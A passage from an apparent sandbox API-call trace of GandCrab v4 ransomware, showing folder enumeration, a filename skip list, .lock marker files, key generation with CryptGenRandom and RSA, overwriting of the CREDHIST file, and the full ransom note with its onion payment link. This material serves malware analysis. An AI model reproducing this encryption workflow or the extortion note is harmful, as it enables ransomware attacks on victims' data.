lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0061.697] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a08d2ca4dee3d.lock") returned 77 [0061.697] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\proof\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0061.697] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.697] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.698] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\") returned 54 [0061.698] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\*" [0061.698] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd260 [0061.698] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.698] FindNextFileW (in: hFindFile=0xfbd260, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.698] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.698] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.698] FindNextFileW (in: hFindFile=0xfbd260, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.698] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0061.698] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0061.698] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a08d2ca4dee3d.lock" [0061.698] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.698] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 82 [0061.698] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\d2ca4a08d2ca4dee3d.lock") returned 77 [0061.698] lstrlenW (lpString=".lock") returned 5 [0061.698] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.699] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0061.699] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.699] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.699] FindNextFileW (in: hFindFile=0xfbd260, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.699] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0061.699] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0061.699] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\KRAB-DECRYPT.txt" [0061.699] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.699] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\KRAB-DECRYPT.txt.KRAB") returned 75 [0061.699] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\KRAB-DECRYPT.txt") returned 70 [0061.699] lstrlenW (lpString=".txt") returned 4 [0061.700] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.700] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0061.702] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.702] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\KRAB-DECRYPT.txt") returned 70 [0061.702] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\KRAB-DECRYPT.txt") returned 70 [0061.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0061.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0061.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0061.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0061.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0061.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0061.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0061.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0061.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0061.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0061.703] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.703] FindNextFileW (in: hFindFile=0xfbd260, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0061.703] FindClose (in: hFindFile=0xfbd260 | out: hFindFile=0xfbd260) returned 1 [0061.703] CloseHandle (hObject=0x3ac) returned 1 [0061.703] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0061.703] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0061.704] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0061.704] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Protect" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect" [0061.704] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\" [0061.704] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0061.704] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0061.704] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0061.704] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0061.704] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0061.704] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.704] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.704] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\\\KRAB-DECRYPT.txt") returned 73 [0061.705] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0061.738] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0061.738] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0061.738] CloseHandle (hObject=0x3ac) returned 1 [0061.739] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.739] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.740] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0x3b2)) [0061.740] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.740] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0061.740] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0061.740] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a08d2ca4dee3d.lock") returned 79 [0061.740] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0061.741] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.741] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.742] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\") returned 56 [0061.742] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\*" [0061.742] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd1e0 [0061.742] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.742] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.742] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.742] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.742] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.742] lstrcmpW (lpString1="CREDHIST", lpString2=".") returned 1 [0061.742] lstrcmpW (lpString1="CREDHIST", lpString2="..") returned 1 [0061.742] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="CREDHIST" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" [0061.742] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.742] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.KRAB") returned 69 [0061.742] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0061.742] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0061.742] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0061.742] lstrcmpiW (lpString1="CREDHIST", lpString2="desktop.ini") returned -1 [0061.742] lstrcmpiW (lpString1="CREDHIST", lpString2="autorun.inf") returned 1 [0061.742] lstrcmpiW (lpString1="CREDHIST", lpString2="ntuser.dat") returned -1 [0061.742] lstrcmpiW (lpString1="CREDHIST", lpString2="iconcache.db") returned -1 [0061.742] lstrcmpiW (lpString1="CREDHIST", lpString2="bootsect.bak") returned 1 [0061.743] lstrcmpiW (lpString1="CREDHIST", lpString2="boot.ini") returned 1 [0061.743] lstrcmpiW (lpString1="CREDHIST", lpString2="ntuser.dat.log") returned -1 [0061.743] lstrcmpiW (lpString1="CREDHIST", lpString2="thumbs.db") returned -1 [0061.743] lstrcmpiW (lpString1="CREDHIST", lpString2="KRAB-DECRYPT.html") returned -1 [0061.743] lstrcmpiW (lpString1="CREDHIST", lpString2="KRAB-DECRYPT.txt") returned -1 [0061.743] lstrcmpiW (lpString1="CREDHIST", lpString2="CRAB-DECRYPT.txt") returned 1 [0061.743] lstrcmpiW (lpString1="CREDHIST", lpString2="ntldr") returned -1 [0061.743] lstrcmpiW (lpString1="CREDHIST", lpString2="NTDETECT.COM") returned -1 [0061.743] lstrcmpiW (lpString1="CREDHIST", lpString2="Bootfont.bin") returned 1 [0061.743] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.743] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0061.743] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.744] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.744] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.744] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0061.744] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.744] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.744] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0061.745] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.745] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.745] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.745] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0061.745] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.745] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.746] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0061.746] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd720) returned 1 [0061.746] CryptGetKeyParam (in: hKey=0xfbd720, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0061.746] CryptEncrypt (in: hKey=0xfbd720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0061.746] GetLastError () returned 0x0 [0061.747] CryptDestroyKey (hKey=0xfbd720) returned 1 [0061.747] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.747] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0061.747] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd3a0) returned 1 [0061.747] CryptGetKeyParam (in: hKey=0xfbd3a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0061.747] CryptEncrypt (in: hKey=0xfbd3a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0061.747] GetLastError () returned 0x0 [0061.747] CryptDestroyKey (hKey=0xfbd3a0) returned 1 [0061.747] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.748] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0061.748] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.748] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.748] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0x1c8, lpOverlapped=0x0) returned 1 [0061.762] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfffffe38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.762] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x1c8, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0x1c8, lpOverlapped=0x0) returned 1 [0061.762] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0061.769] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.774] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.774] CloseHandle (hObject=0x440) returned 1 [0061.775] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.775] MoveFileW 